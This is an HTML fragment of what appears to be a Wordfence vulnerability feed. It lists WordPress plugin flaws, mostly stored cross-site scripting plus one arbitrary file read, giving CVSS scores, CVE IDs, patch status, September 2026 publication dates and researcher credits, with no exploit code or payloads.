<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/53ef2e77-e1b5-4421-a8e4-55302a4551b3" target="_blank" rel="noopener">Youzify – BuddyPress Community, User Profile, Social Network &amp; Membership Plugin for WordPress &lt;= 1.3.7 &#8211; Authenticated (Subscriber+) Arbitrary File Read</a></h4>
<div class="cvss-score-badge">6.5</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.5 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81275" target="_blank" rel="noopener noreferrer">							CVE-2026-81275						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/youzify" target="_blank" rel="noopener">Youzify – BuddyPress Community, User Profile, Social Network &amp; Membership Plugin for WordPress</a> <span class="wfvr-software-slug">[youzify]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dodoh4t" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2b7e2a8d4c137f1479be4362c52fd452.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2b7e2a8d4c137f1479be4362c52fd452"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dodoh4t" target="_blank" rel="noopener">dodoh4t</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/53ef2e77-e1b5-4421-a8e4-55302a4551b3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/566f542e-b15d-421f-a004-814f8c8cc846" target="_blank" rel="noopener">Advanced Customized Prompts &lt;= 1.0.1 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14565" target="_blank" rel="noopener noreferrer">							CVE-2026-14565						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/advanced-customized-prompts" target="_blank" rel="noopener">Advanced Customized Prompts</a> <span class="wfvr-software-slug">[advanced-customized-prompts]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xbassia" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/aaf374001487ef75a3024e689e8db54a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="aaf374001487ef75a3024e689e8db54a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xbassia" target="_blank" rel="noopener">0xBassia</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/566f542e-b15d-421f-a004-814f8c8cc846" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6d6eacb3-6a0f-4bea-8da6-7d1b28ca47c0" target="_blank" rel="noopener">AI Builder – Generate pages, blocks, images &amp; translate with AI 2.4.1 &#8211; 2.7.7 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85678" target="_blank" rel="noopener noreferrer">							CVE-2026-85678						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ai-builder" target="_blank" rel="noopener">AI Builder – Generate pages, blocks, images &amp; translate with AI</a> <span class="wfvr-software-slug">[ai-builder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-minaruzzaman-shovon" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/55478b939c5cdb4a8cfa65ea7f5081fe.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="55478b939c5cdb4a8cfa65ea7f5081fe"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/md-minaruzzaman-shovon" target="_blank" rel="noopener">Md. Minaruzzaman Shovon</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6d6eacb3-6a0f-4bea-8da6-7d1b28ca47c0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/59650bce-1b7c-4d3f-b4b0-594108510453" target="_blank" rel="noopener">Aruba HiSpeed Cache &lt;= 3.0.14 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via Post Content</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15889" target="_blank" rel="noopener noreferrer">							CVE-2026-15889						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/aruba-hispeed-cache" target="_blank" rel="noopener">Aruba HiSpeed Cache</a> <span class="wfvr-software-slug">[aruba-hispeed-cache]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theviper17y" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/01dce303f1fab51371215f21992679d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01dce303f1fab51371215f21992679d9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theviper17y" target="_blank" rel="noopener">theviper17y</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/59650bce-1b7c-4d3f-b4b0-594108510453" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9980f60b-2e0b-4eb1-9d63-1657b0f9d677" target="_blank" rel="noopener">Bold Page Builder &lt;= 5.9.9 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-62110" target="_blank" rel="noopener noreferrer">							CVE-2026-62110						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bold-page-builder" target="_blank" rel="noopener">Bold Page Builder</a> <span class="wfvr-software-slug">[bold-page-builder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/levinitycyber" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0203e07dd2cfa312f294f9391bdec1e8.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0203e07dd2cfa312f294f9391bdec1e8"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/levinitycyber" target="_blank" rel="noopener">LevinityCyber</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9980f60b-2e0b-4eb1-9d63-1657b0f9d677" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e739b324-f833-4b31-8d4c-40538c924ddf" target="_blank" rel="noopener">Bold Timeline Lite &lt;= 1.2.8 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-7438" target="_blank" rel="noopener noreferrer">							CVE-2026-7438						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bold-timeline-lite" target="_blank" rel="noopener">Bold Timeline Lite</a> <span class="wfvr-software-slug">[bold-timeline-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zaim" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4c2bd6964b38518385c4e8d1791fd762.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4c2bd6964b38518385c4e8d1791fd762"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zaim" target="_blank" rel="noopener">zaim</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e739b324-f833-4b31-8d4c-40538c924ddf" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/06ec5c60-169c-4bbb-92bf-802805d46c62" target="_blank" rel="noopener">Booking for Appointments and Events Calendar – Amelia &lt;= 2.4.9 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;load_manually&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-10148" target="_blank" rel="noopener noreferrer">							CVE-2026-10148						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ameliabooking" target="_blank" rel="noopener">Booking for Appointments and Events Calendar – Amelia</a> <span class="wfvr-software-slug">[ameliabooking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-anh-quan-prototw" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0835cd406574e6e3583506c980d8cf19.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0835cd406574e6e3583506c980d8cf19"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-anh-quan-prototw" target="_blank" rel="noopener">Nguyen Anh Quan (prototw)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/06ec5c60-169c-4bbb-92bf-802805d46c62" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/258339a5-c3d5-4777-bd15-7141501f1501" target="_blank" rel="noopener">Builderall for WordPress &lt;= 3.0.2 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;bg_video_service_url&#8217; Setting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15796" target="_blank" rel="noopener noreferrer">							CVE-2026-15796						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/builderall-cheetah-for-wp" target="_blank" rel="noopener">Builderall for WordPress</a> <span class="wfvr-software-slug">[builderall-cheetah-for-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/258339a5-c3d5-4777-bd15-7141501f1501" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2688ee-f416-4fce-b73a-864f31057146" target="_blank" rel="noopener">Builderall for WordPress &lt;= 3.0.2 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via Photo Module &#8216;attributes&#8217; Setting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15820" target="_blank" rel="noopener noreferrer">							CVE-2026-15820						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/builderall-cheetah-for-wp" target="_blank" rel="noopener">Builderall for WordPress</a> <span class="wfvr-software-slug">[builderall-cheetah-for-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2688ee-f416-4fce-b73a-864f31057146" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6dfa9533-3f3e-4a34-bcd6-4a1395983be0" target="_blank" rel="noopener">Content Mask 1.7.1 &#8211; 1.8.5.5 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2025-15690" target="_blank" rel="noopener noreferrer">							CVE-2025-15690						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/content-mask" target="_blank" rel="noopener">Content Mask</a> <span class="wfvr-software-slug">[content-mask]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/andrea-fiocchi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/38acd6ff342d0c9619b2f9ace105c04a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="38acd6ff342d0c9619b2f9ace105c04a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/andrea-fiocchi" target="_blank" rel="noopener">Andrea Fiocchi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6dfa9533-3f3e-4a34-bcd6-4a1395983be0" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5d2c4204-90ee-4703-ae46-c6a0e260451c" target="_blank" rel="noopener">CoolClock &lt; 4.3.8 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-83545" target="_blank" rel="noopener noreferrer">							CVE-2026-83545						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/coolclock" target="_blank" rel="noopener">CoolClock</a> <span class="wfvr-software-slug">[coolclock]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/philipp-doblhofer" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bb525902f3ac5c4bbe1c6fb9fa9a0b4d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bb525902f3ac5c4bbe1c6fb9fa9a0b4d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/philipp-doblhofer" target="_blank" rel="noopener">Philipp Doblhofer</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5d2c4204-90ee-4703-ae46-c6a0e260451c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ad7fd987-02f3-40a7-8718-fbbb20f67b59" target="_blank" rel="noopener">CoolClock &lt;= 4.3.7 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-83546" target="_blank" rel="noopener noreferrer">							CVE-2026-83546						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/coolclock" target="_blank" rel="noopener">CoolClock</a> <span class="wfvr-software-slug">[coolclock]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/philipp-doblhofer" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bb525902f3ac5c4bbe1c6fb9fa9a0b4d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bb525902f3ac5c4bbe1c6fb9fa9a0b4d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/philipp-doblhofer" target="_blank" rel="noopener">Philipp Doblhofer</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ad7fd987-02f3-40a7-8718-fbbb20f67b59" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/48edae16-5e89-4eec-8953-08cbebdd27a7" target="_blank" rel="noopener">Custom Menu Wizard Widget &lt;= 3.3.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-83532" target="_blank" rel="noopener noreferrer">							CVE-2026-83532						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 12, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-menu-wizard" target="_blank" rel="noopener">Custom Menu Wizard Widget</a> <span class="wfvr-software-slug">[custom-menu-wizard]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/48edae16-5e89-4eec-8953-08cbebdd27a7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7bf1d5a8-84b7-40e3-b258-eef599b64add" target="_blank" rel="noopener">Easy Google Fonts &lt;= 2.0.4 &#8211; Authenticated (Author+) Stored Cross-Site Scripting via control_selectors Meta Field</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-4657" target="_blank" rel="noopener noreferrer">							CVE-2026-4657						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-google-fonts" target="_blank" rel="noopener">Easy Google Fonts</a> <span class="wfvr-software-slug">[easy-google-fonts]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kitch-global" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0102fd7126a849e8c689687f1e61ce46.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0102fd7126a849e8c689687f1e61ce46"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/kitch-global" target="_blank" rel="noopener">Kitch</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
